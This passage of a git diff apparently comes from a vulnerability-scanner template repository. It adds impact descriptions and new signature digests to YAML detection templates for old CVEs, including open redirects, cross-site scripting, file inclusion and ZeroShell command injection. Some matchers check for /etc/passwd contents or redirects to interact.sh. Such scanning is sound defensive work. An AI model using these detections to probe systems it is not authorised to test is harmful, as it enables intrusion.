Groupware to fix the vulnerability. reference: @@ -45,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c038f1228140ac219d52db4ac935001c95f9c1d446165668109ce4beee89ce54022053555ab9030c57883e97f6b5387e415d1116add7b8c7d61fcf0f53f8f63abb6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022012df863c30fb119eab34b1e075cfc549f79b962d5ee0256cc191605f184b042c022100ee6d6910021f8368041415f1c29568a224afa0bd4c90711c6ecef91e15f67a13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-3634.yaml b/http/cves/2005/CVE-2005-3634.yaml index f70ba9afda..a7f24f1089 100644 --- a/http/cves/2005/CVE-2005-3634.yaml +++ b/http/cves/2005/CVE-2005-3634.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | frameset.htm in the BSP runtime in SAP Web Application Server (WAS) 6.10 through 7.00 allows remote attackers to log users out and redirect them to arbitrary web sites via a close command in the sap-sessioncmd parameter and a URL in the sap-exiturl parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Apply the latest security patches and updates provided by SAP to fix the open redirect vulnerability. reference: @@ -40,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 490a0046304402201ed65f33515c85457e0554acc0db27813e67680002c76547791a87a2528ee8f702200cf156ab25abae0ba9b6284d127206b2afbbf1449ef60b0bd8d1643a3ab35938:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd85215e179a268944da628fd2825c25be84f1d781f2eb54871fa7e3e13d9e9e022100d3ddb1c0a27197923318f0dd20a6ba42024cfd43b86ef1ab690f72558f0d6c36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2005/CVE-2005-4385.yaml b/http/cves/2005/CVE-2005-4385.yaml index af5db26817..3ca9ec067a 100644 --- a/http/cves/2005/CVE-2005-4385.yaml +++ b/http/cves/2005/CVE-2005-4385.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Cofax 2.0 RC3 and earlier contains a cross-site scripting vulnerability in search.htm which allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a version of Cofax that is not affected by this vulnerability or apply the necessary patches provided by the vendor. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220109614eef224949e56be06ed96b7253bf9eeaaaca6b3e4d13bad94f187f50763022025be825f048689d4e2fb40c8cab4f5be2a16e56a263e77a4c10b8b718f948edc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b167d92c80698ced12089ab60b5599c68ac644764fc7c498b54ba3b419645a7022100df03e54fcb0545995de5efa160937f4291cc667f1492d78e48ce8afcff374056:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-1681.yaml b/http/cves/2006/CVE-2006-1681.yaml index 0b474c8ba4..4e07c04fa4 100644 --- a/http/cves/2006/CVE-2006-1681.yaml +++ b/http/cves/2006/CVE-2006-1681.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Cherokee HTTPD 0.5 and earlier contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Cherokee HTTPD or apply the necessary security patches to mitigate the XSS vulnerability. reference: @@ -45,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022033ff4b2d0618993f110bdcee1826f352569694a911159307a8f47963b4726556022038d273a79b3532c7f80935bec832c34c7892f005e3108ecc80ca91912b3eb12e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a624286010449dfbca736566eca4b83ef242b54957df99d637e088e9f74d226022100df79ccce801ecbe05018cb6c9e29bc7f6acf5836a0f68bc4640d5c55a8fdbdbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2006/CVE-2006-2842.yaml b/http/cves/2006/CVE-2006-2842.yaml index ecc0901ff3..ddc0cd6633 100644 --- a/http/cves/2006/CVE-2006-2842.yaml +++ b/http/cves/2006/CVE-2006-2842.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: high description: SquirrelMail 1.4.6 and earlier versions are susceptible to a PHP local file inclusion vulnerability in functions/plugin.php if register_globals is enabled and magic_quotes_gpc is disabled. This allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade Squirrelmail to a version higher than 1.4.6 or apply the necessary patches to fix the LFI vulnerability. reference: @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cf681f51c8fd7ad8f71ddb5ab7fbf70ab26af8ef9f4e1eecf899ef7e15a9cfc7022100fd0d57febf53d04624632cee41a8d0d9e2d2fccd8fb7fa76c099ec12679f4da0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022070351a9e8db3cd73242680b18ba040226de4685b2c47e1382a982513fb0fc4f6022100e11c42b749f6d407caa47bb25997db8749ff4658e5d89ccf2215774153751083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index ce8f0cf862..0b75097769 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor. reference: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220712fc391a3e3be1f9f89f83c89ca00e016a1ae009e593ef7f256bc272a71792f022100eddfcc0868a4e91ff4b82eaa8fa52e5f192d150f48f12b868d02d656b1a5f363:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b096332d183a0234d0cbd3bfbc4b5149fddfbfe961ca49519ef85975a12413e50221008eee0c4a8fbdcd33a40800400dd5bd396f02ffb63cb375616260a0d10b0fce8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 5a9fa71597..04f66dce08 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. + impact: | + Remote code execution remediation: | Update to the latest version of Apache Struts2 reference: @@ -49,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022063c92b81235f315f81680c3e5e93dc814dfe125814e43dcb6cff373d90d06df2022100a730d9a5439ccba872f1932b6625658746e1dedae50d3d88b40a0e484f9399cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100efb00dfbe2fbe5543741c32ac6e81e36f307f5d67597644c0e036fb51692ea570220191deb545db561480334ffe98f010ae2ca82883fae8e71451c75675f56ee4501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 5ebb21682c..aa28240ef1 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor. reference: @@ -50,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ad3097a5f6494d45fc14b874469d62f42b9c84b273bc97b0688766f2d713b972022100e9ef7b1933fd6aa3ae8272f3d178f59cab4f4f5998bf9faaa1791557fec4245c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dc5ae294908867ea9cfb3d84402f9150ea3eba52581a1435594505653c59b4a902202749fa215a1e51172d887e6a52ca776e6530f8537f8df687fba7ed249836eb6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index b869d3db02..86cffe969a 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -6,6 +6,8 @@ info: severity: high description: | PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation. remediation: | Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: @@ -45,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100db5f69276d7187ac5e9ccd8fd496e438c208ccece891c346d8bde457e12843ed02204a3892717752fadf89f73626fb71fb105db24ea7b2a8f774024dc523cbaa3831:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202baf6dbc687b03d671808dd265b4bd483e0db5122a79101074736b0280a3b8a6022100fe1672451273fca5b4feda5dac2ed3961821928bc670fa6690bb5a5816910bd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 327215f351..0b16c19cce 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability. reference: @@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022009e0335783eef020014410f2e510ddaeb0729cbd858f61bd7142e3099b53a47e022064cfb538a41735c933bef0eec4be787cb021a3e82f3ed2904ecaecb8b3f60015:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8a1715cd99d2a316fc96a49ad96d5fcb9e60d314fa0227f341da5c5964d63d1022034fc66ce4d2ff88c7bbaad9997d6a4da683cffe1a97d693b84d3918d4654d340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index f7e977732c..182e4ff960 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. + impact: | + An attacker can exploit this vulnerability to trick users into visiting malicious websites, leading to potential phishing attacks. remediation: | Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server. reference: @@ -40,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4b0a00483046022100ea8393f7c2fcb36e817067e028b4eb79d7da58d6cb3df979f437089ae9ec5b44022100b5b40586f3165ddb2cbf5e9678ec12ed29ef4c8039ab93e0a5b04f0aa31a595e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022042de3ed0e9fbe496c588f3edb67152006b98090716fbf000556dc8edaf836bf9022056dc3d31d210a950d8ddc0f728c2e9712fe5ec45775636b0fbb655b92a58e095:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index bd4476c962..eb2dd50f03 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -5,6 +5,8 @@ info: author: unstabl3 severity: medium description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor. reference: @@ -45,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204c02560c678b8087c28bfeed200bf5f25dc9f74261527fa9d7a2fb3b146becf8022100dee5ed65d2accf8d9f2bd7d38d04efb7b5eb7e70f8a26b9ebb580f3c5279e580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022042436195e99587054a6a10ee089470c1fadab498fe1b556fc0cdcde579d92d5602201b1af0719bba0f8007ca800e10004e6be93d7ec53b7ec4fe0f627c5372dcdca9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index 4a5a879c39..3dacac2ead 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor. reference: @@ -45,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203023e84e303b4688ad150f602ceea289a63ee29df8e12b9f39e6ebac23772d86022100f6e29101c5642afe45708838994bce4898278fe0adfb03b7b2124b7f0ceef30f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bbdf518966c75a44af19b519ed2a3d642aced2b7aaff600afa01c21c5509066f0221009c184332053f598d45bba3340388cadda4c7c8b8dabdb66884deea62912365b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index 686bb887ce..60ae910df7 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: critical description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability. reference: @@ -40,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202feaa0d486d5070e9e7bfd4efd73233251cc5396a98dfc67390f6a5630c2e633022010d10fb2d53407cc4f72002217767dfdf8eef452f44b74b5fe6c27a5029e9c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206851937b7e99292685636e8eef2e6b0b33d2b8d19446ba160013767d605e5fbb0220103e5f70323feb34b2b691f0e0fc3c7c89a457f0e351756ea16091a69d38e1c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 11253a4d4e..2d59d570f4 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDK severity: medium description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server and potentially execute arbitrary code. remediation: | Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor. reference: @@ -42,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033f0c2315a611613fda0fb73c18a12113fa19156574aefbf477b092d512c58710221009494212e159047a9d4f26d0d900af8c3a6c04abb2086da29e47e858052513990:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad5280aa6eac0929495f63d9882328a6c7dfd9bc0e135183d17a7c4cbc1e741e02203c987c6747a3bd616cd71adf3e491eeaee52d52f4dc1c2e0d5041d063956d83c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 3a02907d51..2a1765763f 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution. remediation: | Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability. reference: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c9a4ffd62555b868c4f74ccec0a683f901fce786056f157a2b745ae2d175c6c902200803e8831676633b7e4035222f60a624ca213872992d2bdf3e6024bc574be95a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e01b4968812ad7ad9b056cd634b2606c5650c02cf33012f5aef863b48bc969340220533ab0def58e9b6e81e56a8ae60e8116c2a03ef694aa21fc9601afd4798bce87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index af1feed620..bbac849887 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage. remediation: | Update Joomla! Component RWCards to the latest version to mitigate the vulnerability. reference: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210095f2553fda2f3bf455c5d6646d07cd536a1461506147b3d9f7c73b2c95aaa238022100cd50381518519c3903ec58739cca597e15d2f61c984c96e95876e26a79b860b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aef3f723e04346fa7a2f8ac6c5abcf0174ca81a3aeb442367ae4d018f6ff964d0220337061d4274cc4456d6d13a49d5c1782ecb4b44cade9063e2389ffe246990c55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 56eb5bedb9..529ec4dfe5 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability. reference: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e1afab8f9b7ea6d75940642627e9093d1248edb6b7f67043b5d83c2234eab0ea02206f00bafb8c8bdd919ddfde1f0d342b74d4d12749e255eca7e04072de4c509453:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fff4f0725abf21bcf55b6825cfd022b20b75e41e680ce18e4b08169f2923f78102210092bfa1840e5d2b94020d6226d2bbb157df2c1f344bef122db55ec8da3aba7044:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index ff0f77db1b..3b7a0f0c62 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. reference: @@ -51,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b80eb05b64f804b1723e8d639c5985bc0aa09179c5f49be126abebb760da43db022100cda31ba602da0faee37f3838369448ee852a5c9a1b2c14cf70103dd503be9475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202610c0f8d75d86e21ed6b2d7639a5f879540ed64700ccef63d61d5c49545056802200ccac5c2868b1a18b7542ad02343694a9839c8aa827db9bfde1ab7ba81d1844c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 870d23297f..51f1f21cbc 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor. reference: @@ -42,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100854eb0a19f68fd8f0c16b795237778394d481fedef431451051251d791f7e7d202203cc01a5cbd10885ed29bef8ebf64d830be1f221982512b569ffd9a9a79fdc8b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f317aa209617a0ac0f5b27dc38710858835641d5769cd8499709bad9cc17fa84022100b0cb6a925a432d6b22fd4ee7412c7fb438956de1fe797d92627665c8aee77a32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index d945879fc2..3fd4331563 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -48,4 +50,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502201dea20a32ebb693d393be0d294a74bfb5b9eecb6827a8f58f157213a60428483022100e6ccfd9ff53c1724d243de900f9df24ec006a615484403dbdafa7537a3f0adca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022060c1d7a1d7f167f4a7725386e3770f50fc41cf720cfb3766a490be90bbfc632902207e45517728eabf9310ab9dc5a100c296a85431a2f94ce584aefb7d6c05833a1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index 35660774d8..159656a9ff 100644 --- a/http/cves/2009/CVE-2009-0347.yaml +++ b/http/cves/2009/CVE-2009-0347.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter. + impact: | + An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks. remediation: | Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability. reference: @@ -38,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a0047304502203ea8208e5f9c9a959ba132a829842ec16412e7e89e96459e772d992c1a0b419c022100bd66f70af78b54921981fa5210b7501871ae6c713617a56758b1f9b014f98e92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051577f83aae8349027a0a3bfc2ed4386c0b9e1c09644dc0ddd098802e023c7e0022100e69fe1be6eeae6d3523eaf92aa776f94d0e42396edf72f348c0378ef7cd1da9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index b3d9db9a47..007940e9e3 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system. remediation: | Upgrade to a patched version of ZeroShell. reference: @@ -37,4 +39,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a0046304402203105e50de1b89b0165f438c48a50bd8a44fa30fe03592c5339c4a2949854804f02205fe7cbf331da5c49f1ac8be6ab55653b4358eb25d9be80a5c5df917c3cf205a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c159232e524cc33af61389e36bdf93790ac051100d465a44d101fed437d6d01902204c3f4b377b80d05a6d606971b970a5f55e7a05e99e48a7ded66295d9c1c523c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index d70da60c02..3da2192a79 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. remediation: | Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware. reference: @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a48cabc5ed3721b402591d4860fd38d126b7e940ba2c6425733a7625ad7cabea0220690367ee6216c533f32eee62a5df670afffdd17227db036d876ae0a981872bdb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100907faaad405c2236acd897cde184a91ef45ebbb033646c1c1e188b95abf7c2c202207c5a4151cd8bfbbf28ff42b726095b019cc0d25d4d1e2105313cc0a7cbd516a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2009/CVE-2009-1151.yaml 